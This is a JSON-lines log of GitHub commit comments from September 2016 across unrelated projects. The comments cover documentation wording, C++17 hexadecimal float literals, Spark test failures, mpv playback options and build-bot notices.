{"id":"4549919082","type":"CommitCommentEvent","actor":{"login":"mpoapostolis"},"repo":{"name":"mpoapostolis/Diathymia"},"payload":{"comment":{"id":18986339,"position":null,"line":null,"path":null,"commit_id":"027b7dbe0913a578cfa25efbb201dabecb69ae92","created_at":"2016-09-12T15:13:27Z","updated_at":"2016-09-12T15:13:27Z","body":"https://fonts.googleapis.com/icon?family=Material+Icons\" rel=\"stylesheet to slow"}},"created_at":"2016-09-12T15:13:27Z"}
{"id":"4549920943","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-bio-scholar"},"payload":{"comment":{"id":18986348,"position":null,"line":null,"path":null,"commit_id":"b2c35bea246ae6fd3d679522e235b2bbca548c16","created_at":"2016-09-12T15:13:45Z","updated_at":"2016-09-12T15:13:45Z","body":"Both reference videos are good, just note that both balls are pretty similar in weight and bounciness - so to differentiate them in the animation you will probably want to exaggerate them."}},"created_at":"2016-09-12T15:13:45Z"}
{"id":"4549921520","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18986349,"position":43,"line":210,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T15:13:51Z","updated_at":"2016-09-12T15:13:51Z","body":"I like that wording better."}},"created_at":"2016-09-12T15:13:51Z"}
{"id":"4549923443","type":"CommitCommentEvent","actor":{"login":"eschaettin"},"repo":{"name":"eschaettin/fhem-mirror"},"payload":{"comment":{"id":18986354,"position":null,"line":null,"path":null,"commit_id":"68def2f3be4a8ee6dcc4c1f70902caf6d0cfef25","created_at":"2016-09-12T15:14:09Z","updated_at":"2016-09-12T15:14:09Z","body":"Syntax error in defintion of captionLeft"}},"created_at":"2016-09-12T15:14:09Z"}
{"id":"4549926364","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18986364,"position":64,"line":275,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T15:14:38Z","updated_at":"2016-09-12T15:14:38Z","body":"`while True:` ? The performance penalty of looking up the `True` global is gone in Python 3."}},"created_at":"2016-09-12T15:14:38Z"}
{"id":"4549932186","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18986380,"position":null,"line":null,"path":null,"commit_id":"04981808ea6720b24b91322cc4ad8568b14321b0","created_at":"2016-09-12T15:15:34Z","updated_at":"2016-09-12T15:15:34Z","body":"Oh, my bad. I was looking at the wrong side of the diff...\r\n\r\nYeah that's weird. Did you remove the `MAlonzo` directory before compiling? If so what does the generated code say?"}},"created_at":"2016-09-12T15:15:34Z"}
{"id":"4549932572","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18986382,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T15:15:37Z","updated_at":"2016-09-12T15:15:37Z","body":"Yes, difficult .....\r\n\r\nExample : Question Object 'short text\" simple : use Bootsrap \r\n`<input type=\"text\" class=\"form-control\">`\r\n\r\nWith foundation or knacss:\r\n`<input type=\"text\">`\r\n\r\nbad example, because foundation or knacss don't need form-control. But the idea is here :)\r\n\r\n"}},"created_at":"2016-09-12T15:15:37Z"}
{"id":"4549933337","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-Alex099"},"payload":{"comment":{"id":18986384,"position":null,"line":null,"path":null,"commit_id":"a88cac1c0a8ec5a99fd38593d513b688fe665a94","created_at":"2016-09-12T15:15:44Z","updated_at":"2016-09-12T15:15:44Z","body":"the video file is corrupt - can you commit and push it again? \r\n\r\nthe other videos look good, but it will help if you shoot them from further back so the balls stay in the frame the whole time. \r\n"}},"created_at":"2016-09-12T15:15:44Z"}
{"id":"4549934331","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18986389,"position":103,"line":314,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T15:15:54Z","updated_at":"2016-09-12T15:15:54Z","body":"Was there more to that thought, or should that be a period?"}},"created_at":"2016-09-12T15:15:54Z"}
{"id":"4549935819","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18986391,"position":112,"line":322,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T15:16:10Z","updated_at":"2016-09-12T15:16:10Z","body":"I like this wording."}},"created_at":"2016-09-12T15:16:10Z"}
{"id":"4549935845","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-Alex099"},"payload":{"comment":{"id":18986392,"position":null,"line":null,"path":null,"commit_id":"a88cac1c0a8ec5a99fd38593d513b688fe665a94","created_at":"2016-09-12T15:16:11Z","updated_at":"2016-09-12T15:16:11Z","body":"After that, please add the thumbnail sketches."}},"created_at":"2016-09-12T15:16:11Z"}
{"id":"4549943507","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18986406,"position":null,"line":null,"path":null,"commit_id":"d319e5ace2cce220160ecc4a7cd3e74c9624889b","created_at":"2016-09-12T15:17:24Z","updated_at":"2016-09-12T15:17:24Z","body":"with this change, the bootstrap is now fully automated"}},"created_at":"2016-09-12T15:17:24Z"}
{"id":"4549947094","type":"CommitCommentEvent","actor":{"login":"nden"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18986411,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T15:17:57Z","updated_at":"2016-09-12T15:17:57Z","body":"I think we want the x,y center for the shutter with the source, i.e. where background == 'N'. Right?"}},"created_at":"2016-09-12T15:17:57Z"}
{"id":"4549948623","type":"CommitCommentEvent","actor":{"login":"olibre"},"repo":{"name":"cpp-frug/materials"},"payload":{"comment":{"id":18986417,"position":6,"line":353,"path":"news/2016_n3_Cpp17_Nouveautes-du-langage.md","commit_id":"0a5baf033fbc3f50205c0cd450097f8743ee91a4","created_at":"2016-09-12T15:18:13Z","updated_at":"2016-09-12T15:18:13Z","body":"Salut @rom1v \r\n\r\nEn fait, l'exposant de type `p-2` est obligatoire.\r\nDonc, la question du `F` final ne se pose pas.\r\nJ'ai publié une réponse sur SO pour garder une trace :\r\nhttp://stackoverflow.com/a/39453523/938111\r\n\r\n---------------\r\n\r\nThe Technical Specification [P0245 *Hexadecimal floating literals for C++*](http://wg21.link/p0245) has been voted into C++17 at the ISO C++ Standards Committee in Jacksonville, Florida on February 2016.\r\n\r\nThe language C99 also has this feature, and the C++ feature is compatible.\r\n\r\nHowever, as pointed by the [Lưu Vĩnh Phúc](http://stackoverflow.com/users/995714/l%c6%b0u-v%c4%a9nh-ph%c3%bac)'s comment, the syntax `0x011.1` is not part of the standard. The exponent is mandatory for hexadecimal floating-point literals. One reason is to avoid ambiguity of the trailing `F` within `0x011.1F`. Is it the hex digit `F` of the fractional part or the floating-suffix meaning `float`?\r\n\r\nSee the more readable page [floating literal page on cppreference.com](http://en.cppreference.com/w/cpp/language/floating_literal).\r\n\r\n> `0x | 0X hex-digit-sequence`\r\n> `0x | 0X hex-digit-sequence .`\r\n> `0x | 0X hex-digit-sequence(optional) . hex-digit-sequence`\r\n>\r\n> Hexadecimal digit-sequence representing a whole number without a radix separator. The exponent is never optional for hexadecimal floating-point literals: `0x1ffp10`, `0X0p-1`, `0x1.p0`, `0xf.p-1`, `0x0.123p-1`, `0xa.bp10l`\r\n>\r\n> The exponent syntax for hexadecimal floating-point literal has the form\r\n> `p | P exponent-sign(optional) digit-sequence`\r\n>\r\n> exponent-sign, if present, is either + or -\r\n>\r\n> suffix, if present, is one of `f`, `F`, `l`, or `L`. The suffix determines the type of the floating-point literal:\r\n>\r\n>  * (no suffix) defines double\r\n>  * `f F` defines float\r\n>  * `l L` defines long double\r\n\r\nSee also the current working draft C++17, chapter **§ 2.13.4 Floating literals** on GitHub:\r\nhttps://github.com/cplusplus/draft/raw/master/papers/n4604.pdf\r\n\r\n> *floating-literal:*\r\n>   &emsp; *decimal-floating-literal*\r\n>   &emsp; *hexadecimal-floating-literal*\r\n> *decimal-floating-literal:*\r\n>   &emsp; *fractional-constant exponent-part<sub>opt</sub> floating-suffix<sub>opt</sub>*\r\n>   &emsp; *digit-sequence exponent-part floating-suffix<sub>opt</sub>*\r\n> *hexadecimal-floating-literal:*\r\n>   &emsp; *hexadecimal-prefix hexadecimal-fractional-constant binary-exponent-part floating-suffix<sub>opt</sub>*\r\n>   &emsp; *hexadecimal-prefix hexadecimal-digit-sequence binary-exponent-part floating-suffix<sub>opt</sub>*  \r\n> *fractional-constant:*\r\n>   &emsp; *digit-sequence opt . digit-sequence*\r\n>   &emsp; *digit-sequence .*\r\n> *hexadecimal-fractional-constant:*\r\n>   &emsp; *hexadecimal-digit-sequence<sub>opt</sub> . hexadecimal-digit-sequence*\r\n>   &emsp; *hexadecimal-digit-sequence .*\r\n> *exponent-part:*\r\n>   &emsp; `e` *sign<sub>opt</sub> digit-sequence*\r\n>   &emsp; `E` *sign<sub>opt</sub> digit-sequence*\r\n> *binary-exponent-part:*\r\n>   &emsp; `p` *sign<sub>opt</sub> digit-sequence*\r\n>   &emsp; `P` *sign<sub>opt</sub> digit-sequence*\r\n> *sign:* one of\r\n>   &emsp; `+` `-`\r\n> *digit-sequence:*\r\n>   &emsp; *digit*\r\n>   &emsp; *digit-sequence ’<sub>opt</sub> digit*\r\n> *floating-suffix:* one of\r\n>   &emsp; `f` `l` `F` `L`\r\n>\r\n> <sup>1</sup> A floating literal consists of an optional prefix specifying a base, an integer part, a radix point, a fraction part, an `e`, `E`, `p` or `P`, an optionally signed integer exponent, and an optional type suffix. The integer and fraction parts both consist of a sequence of decimal (base ten) digits if there is no prefix, or hexadecimal (base sixteen) digits if the prefix is `0x` or `0X`. The literal is a *decimal floating literal* in the former case and a *hexadecimal floating literal* in the latter case. Optional separating single quotes in a *digit-sequence* or *hexadecimal-\r\ndigit-sequence* are ignored when determining its value. [ *Example:* The literals `1.602’176’565e-19` and `1.602176565e-19` have the same value. — *end example* ] Either the integer part or the fraction part (not both) can be omitted. Either the radix point or the letter e or E and the exponent (not both) can be omitted from a decimal floating literal. The radix point (but not the exponent) can be omitted from a hexadecimal floating literal. The integer part, the optional radix point, and the optional fraction part, form the *significand* of the floating literal. In a decimal floating literal, the exponent, if present, indicates the power of 10 by which the significand is to be scaled. In a hexadecimal floating literal, the exponent indicates the power of 2 by which the significand is to be scaled. [ *Example:* The literals `49.625` and `0xC.68p+2` have the same value. — *end example* ] If the scaled value is in the range of representable values for its type, the result is the scaled value if representable, else the larger or smaller representable value nearest the scaled value, chosen in an implementation-defined manner.\r\n> The type of a floating literal is `double` unless explicitly specified by a suffix. The suffixes `f` and `F` specify `float`, the suffixes `l` and `L` specify `long double`. If the scaled value is not in the range of representable values for its type, the program is ill-formed.\r\n\r\nAs [unwind](http://stackoverflow.com/a/21526849/938111) has advised, you can use [`strtof()`](http://en.cppreference.com/w/cpp/string/byte/strtof). The following snippet decodes Hexadecimal floating literals (without C++17):\r\n\r\n```cpp\r\n#include <iostream>\r\n#include <cstdlib>\r\n#include <cstdio>\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n   if (argc != 2)\r\n   {\r\n        std::cout <<\"Usage: \"<< argv[0] <<\" 0xA.Bp-1  => Decode hexfloat\" \"\\n\";\r\n        return 1;\r\n   }\r\n    \r\n   long double l;\r\n   double      d;\r\n   float       f;\r\n    \r\n   std::cout <<\"Decode floating point hexadecimal = \"<< argv[1];\r\n   //std::istringstream(argv[1]) >> std::hexfloat >> d;\r\n   l = std::strtold(argv[1],NULL); if(errno == ERANGE) std::cout << \"\\n\" \"std::strtold() range error\";\r\n   d = std::strtod (argv[1],NULL); if(errno == ERANGE) std::cout << \"\\n\" \"std::strtod() range error\";\r\n   f = std::strtof (argv[1],NULL); if(errno == ERANGE) std::cout << \"\\n\" \"std::strtod() range error\";\r\n    \r\n   std::cout <<\"\\n\"  \"long double = \"<< std::defaultfloat << l <<'\\t'<< std::hexfloat << l\r\n             <<\"\\n\"  \"double      = \"<< std::defaultfloat << d <<'\\t'<< std::hexfloat << d\r\n             <<\"\\n\"  \"float       = \"<< std::defaultfloat << f <<'\\t'<< std::hexfloat << f <<'\\n';\r\n}\r\n```"}},"created_at":"2016-09-12T15:18:13Z"}
{"id":"4549948840","type":"CommitCommentEvent","actor":{"login":"sartak"},"repo":{"name":"bestpractical/rt"},"payload":{"comment":{"id":18986418,"position":null,"line":null,"path":null,"commit_id":"8099aa68be69453e1a052db284ca2a8749ed5939","created_at":"2016-09-12T15:18:16Z","updated_at":"2016-09-12T15:18:16Z","body":"Thanks Chris, nice catch. Repushing this branch with your change."}},"created_at":"2016-09-12T15:18:16Z"}
{"id":"4549953027","type":"CommitCommentEvent","actor":{"login":"Kagami"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":18986422,"position":null,"line":null,"path":null,"commit_id":"5bcb22beea14bb48a84c610425d5693e0305e434","created_at":"2016-09-12T15:18:53Z","updated_at":"2016-09-12T15:18:53Z","body":"### mpv v0.18.0\r\n\r\nWorks without any issues: `mpv ytdl://TJfA79eJiGY --ytdl-format='bestvideo+bestaudio'`\r\n\r\n### mpv v0.20.0\r\n\r\nDoesn't work: `mpv ytdl://TJfA79eJiGY --ytdl-format='bestvideo+bestaudio'` (MPEG-Dash Segments unsupported)\r\nWorks: `mpv ytdl://TJfA79eJiGY --ytdl-format='bestvideo'`\r\nWorks: `mpv ytdl://TJfA79eJiGY --ytdl-format='bestaudio'`\r\nDoesn't work: `mpv ytdl://TJfA79eJiGY --ytdl-format='bestvideo[protocol!=http_dash_segments]+bestaudio[protocol!=http_dash_segments]'` (requested format not available)\r\n\r\nCould you please explain what are the correct options to play the exact same formats with the latest mpv?"}},"created_at":"2016-09-12T15:18:53Z"}
{"id":"4549953953","type":"CommitCommentEvent","actor":{"login":"zhuzhuxiaSoft"},"repo":{"name":"zhuzhuxiaSoft/lqzp"},"payload":{"comment":{"id":18986425,"position":null,"line":null,"path":null,"commit_id":"ee1eb839ddfcee5372fa027af24587cb964dec3f","created_at":"2016-09-12T15:19:03Z","updated_at":"2016-09-12T15:19:03Z","body":"yes ,good ,i will teach you how to use this,i am a master ,and you can just call me master.zhu"}},"created_at":"2016-09-12T15:19:03Z"}
{"id":"4549954951","type":"CommitCommentEvent","actor":{"login":"capdilla"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18986426,"position":43,"line":487,"path":"framework/web/View.php","commit_id":"c3622bb1ad5ebf395853fab4f3ad5ddcda0242b4","created_at":"2016-09-12T15:19:09Z","updated_at":"2016-09-12T15:19:09Z","body":"change css for js"}},"created_at":"2016-09-12T15:19:09Z"}
{"id":"4549955727","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18986430,"position":15,"line":34,"path":"src/Orc.Controls.Examples/ViewModels/DatePickerViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-12T15:19:20Z","updated_at":"2016-09-12T15:19:20Z","body":"Done"}},"created_at":"2016-09-12T15:19:20Z"}
{"id":"4549955918","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986431,"position":2,"line":2,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:19:22Z","updated_at":"2016-09-12T15:19:22Z","body":"Should this be itemBunsenModel?  I'm assuming this is for list items?"}},"created_at":"2016-09-12T15:19:22Z"}
{"id":"4549956907","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986432,"position":16,"line":16,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:19:31Z","updated_at":"2016-09-12T15:19:31Z","body":"Same comment here"}},"created_at":"2016-09-12T15:19:31Z"}
{"id":"4549958235","type":"CommitCommentEvent","actor":{"login":"capdilla"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18986436,"position":44,"line":488,"path":"framework/web/View.php","commit_id":"c3622bb1ad5ebf395853fab4f3ad5ddcda0242b4","created_at":"2016-09-12T15:19:41Z","updated_at":"2016-09-12T15:19:41Z","body":"change cssOptions for jsOptions"}},"created_at":"2016-09-12T15:19:41Z"}
{"id":"4549962428","type":"CommitCommentEvent","actor":{"login":"mboehm7"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":18986450,"position":null,"line":null,"path":null,"commit_id":"b3d1932419e32d2f89c1a516044a8da651012ff7","created_at":"2016-09-12T15:20:26Z","updated_at":"2016-09-12T15:20:26Z","body":"since these recent changes, I get errors (as shown below) when running the testsuite through Junit in a single JVM. @deroneriksson could you please have a look:\r\n\r\norg.apache.spark.SparkException: Only one SparkContext may be running in this JVM (see SPARK-2243). To ignore this error, set spark.driver.allowMultipleContexts = true. The currently running SparkContext was created at:\r\norg.apache.spark.api.java.JavaSparkContext.<init>(JavaSparkContext.scala:61)\r\norg.apache.sysml.runtime.controlprogram.context.SparkExecutionContext.initSparkContext(SparkExecutionContext.java:216)\r\norg.apache.sysml.runtime.controlprogram.context.SparkExecutionContext.getSparkContext(SparkExecutionContext.java:136)\r\norg.apache.sysml.test.integration.AutomatedTestBase.getMLContextForTesting(AutomatedTestBase.java:347)\r\norg.apache.sysml.test.integration.functions.mlcontext.FrameTest.testFrameGeneral(FrameTest.java:218)\r\norg.apache.sysml.test.integration.functions.mlcontext.FrameTest.testFrameGeneral(FrameTest.java:136)\r\norg.apache.sysml.test.integration.functions.mlcontext.FrameTest.testCSVInTextOut(FrameTest.java:107)\r\nsun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\nsun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\nsun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\njava.lang.reflect.Method.invoke(Method.java:497)\r\norg.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:47)\r\norg.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)\r\norg.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:44)\r\norg.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)\r\norg.junit.internal.runners.statements.RunBefores.evaluate(RunBefores.java:26)\r\norg.junit.internal.runners.statements.RunAfters.evaluate(RunAfters.java:27)\r\norg.junit.runners.ParentRunner.runLeaf(ParentRunner.java:271)\r\norg.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:70)\r\norg.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50)\r\n\tat org.apache.spark.SparkContext$$anonfun$assertNoOtherContextIsRunning$1.apply(SparkContext.scala:2085)\r\n\tat org.apache.spark.SparkContext$$anonfun$assertNoOtherContextIsRunning$1.apply(SparkContext.scala:2067)\r\n\tat scala.Option.foreach(Option.scala:236)\r\n\tat org.apache.spark.SparkContext$.assertNoOtherContextIsRunning(SparkContext.scala:2067)\r\n\tat org.apache.spark.SparkContext$.setActiveContext(SparkContext.scala:2153)\r\n\tat org.apache.spark.SparkContext.<init>(SparkContext.scala:2025)\r\n\tat org.apache.spark.api.java.JavaSparkContext.<init>(JavaSparkContext.scala:61)\r\n\tat org.apache.sysml.test.integration.mlcontext.MLContextFrameTest.setUpClass(MLContextFrameTest.java:80)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:497)\r\n\tat org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:47)\r\n\tat org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)\r\n\tat org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:44)\r\n\tat org.junit.internal.runners.statements.RunBefores.evaluate(RunBefores.java:24)\r\n\tat org.junit.internal.runners.statements.RunAfters.evaluate(RunAfters.java:27)\r\n\tat org.junit.runners.ParentRunner.run(ParentRunner.java:309)\r\n\tat org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:50)\r\n\tat org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:459)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:675)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:382)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:192)\r\n\r\njava.lang.NullPointerException\r\n\tat org.apache.sysml.test.integration.mlcontext.MLContextFrameTest.tearDownClass(MLContextFrameTest.java:549)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:497)\r\n\tat org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:47)\r\n\tat org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)\r\n\tat org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:44)\r\n\tat org.junit.internal.runners.statements.RunAfters.evaluate(RunAfters.java:33)\r\n\tat org.junit.runners.ParentRunner.run(ParentRunner.java:309)\r\n\tat org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:50)\r\n\tat org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:459)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:675)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:382)\r\n\tat org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:192)\r\n\r\n"}},"created_at":"2016-09-12T15:20:26Z"}
{"id":"4549962623","type":"CommitCommentEvent","actor":{"login":"omgmog"},"repo":{"name":"omgmog/beatmaker"},"payload":{"comment":{"id":18986451,"position":null,"line":null,"path":null,"commit_id":"ce5122f88cddbfb4ac6c6a1062d301aefe30434a","created_at":"2016-09-12T15:20:28Z","updated_at":"2016-09-12T15:20:28Z","body":"![](https://media.giphy.com/media/9lMoyThpKynde/giphy.gif)"}},"created_at":"2016-09-12T15:20:28Z"}
{"id":"4549964940","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18986458,"position":null,"line":null,"path":null,"commit_id":"807f71ddaedb84f1f4954ec4db9c39e3e8bb4cef","created_at":"2016-09-12T15:20:48Z","updated_at":"2016-09-12T15:20:48Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 249](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1205&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:26"}},"created_at":"2016-09-12T15:20:48Z"}
{"id":"4549965043","type":"CommitCommentEvent","actor":{"login":"grasmash"},"repo":{"name":"acquia/blt"},"payload":{"comment":{"id":18986459,"position":null,"line":null,"path":null,"commit_id":"83ca9a391853c4a1c685fdb0b07d239124ecbd92","created_at":"2016-09-12T15:20:49Z","updated_at":"2016-09-12T15:20:49Z","body":"> Are these changes only to local-related files?\r\n\r\nNo, the `$settings['file_public_path'] = \"sites/$site_dir/files\";` change, for instance, will affect all sites.\r\n\r\n> shouldn't the documentation for $site_dir require that it be set in settings.php not blt.settings.php\r\n\r\nYes, a user should define $site_dir in settings php before including blt.settings.php. This is documented in the code: \"You may alternatively set this variable before including blt.settings.php.\""}},"created_at":"2016-09-12T15:20:49Z"}
{"id":"4549965050","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18986460,"position":null,"line":null,"path":null,"commit_id":"0add49c4e58b0b3b2898f29163eb8fbd6ab9b9ed","created_at":"2016-09-12T15:20:49Z","updated_at":"2016-09-12T15:20:49Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 250](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1206&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T15:20:49Z"}
{"id":"4549965214","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986461,"position":61,"line":61,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:20:51Z","updated_at":"2016-09-12T15:20:51Z","body":"Can you add an example of a `link` equivalent?"}},"created_at":"2016-09-12T15:20:51Z"}
{"id":"4549966414","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18986466,"position":null,"line":null,"path":null,"commit_id":"6e09f8522d0761b8f31c311a8afe37021ebc191e","created_at":"2016-09-12T15:21:03Z","updated_at":"2016-09-12T15:21:03Z","body":"lgtm... thanks!"}},"created_at":"2016-09-12T15:21:03Z"}
{"id":"4549967725","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18986469,"position":null,"line":null,"path":null,"commit_id":"651a204fc85dab300ff05093ca8734919678b49e","created_at":"2016-09-12T15:21:16Z","updated_at":"2016-09-12T15:21:16Z","body":"@lekma does it mean SAT>IP server + transcoding ? (can't test due the sat>ip bug that isn't merged from upstream)"}},"created_at":"2016-09-12T15:21:16Z"}
{"id":"4549967942","type":"CommitCommentEvent","actor":{"login":"dnephin"},"repo":{"name":"mstanleyjones/docker"},"payload":{"comment":{"id":18986470,"position":null,"line":null,"path":null,"commit_id":"01fe5639bc46ea6cc2efe7b9333bb4d1abb1894b","created_at":"2016-09-12T15:21:18Z","updated_at":"2016-09-12T15:21:18Z","body":"No, this change wasn't merged into 1.12.x"}},"created_at":"2016-09-12T15:21:18Z"}
{"id":"4549968081","type":"CommitCommentEvent","actor":{"login":"joelpires"},"repo":{"name":"jeKnowledge/stats-jek-v2"},"payload":{"comment":{"id":18986471,"position":null,"line":null,"path":null,"commit_id":"fdcd34db65e780197c09064297d4e9e3e254e2c3","created_at":"2016-09-12T15:21:19Z","updated_at":"2016-09-12T15:21:19Z","body":";-)"}},"created_at":"2016-09-12T15:21:19Z"}
{"id":"4549968379","type":"CommitCommentEvent","actor":{"login":"zhangge29"},"repo":{"name":"zhangge29/hello-world"},"payload":{"comment":{"id":18986473,"position":1,"line":1,"path":"README.md","commit_id":"57fc9a3b875fd12e63e58f68863db2273c49b4a4","created_at":"2016-09-12T15:21:21Z","updated_at":"2016-09-12T15:21:21Z","body":"123"}},"created_at":"2016-09-12T15:21:21Z"}
{"id":"4549969425","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18986476,"position":3,"line":0,"path":"js/js.translator/testData/_commonFiles/asserts.kt","commit_id":"4bd433bbacf3f9f7e947777d557d7ab0c54c268b","created_at":"2016-09-12T15:21:30Z","updated_at":"2016-09-12T15:21:30Z","body":"These assertion functions were copied from `kotlin-test` module: https://github.com/JetBrains/kotlin/blob/master/libraries/kotlin.test/shared/src/main/kotlin/kotlin/test/TestAssertions.kt#L44\nNot sure it will not cause any problems if they would have different behavior in testData codebase.\n\nIs it really a lot of tests here depend on array equality as it was before the change?"}},"created_at":"2016-09-12T15:21:30Z"}
{"id":"4549970709","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986481,"position":61,"line":61,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:21:41Z","updated_at":"2016-09-12T15:21:41Z","body":"I think we should rename this to `selectionButtons` or something like that with `selection` in the name"}},"created_at":"2016-09-12T15:21:41Z"}
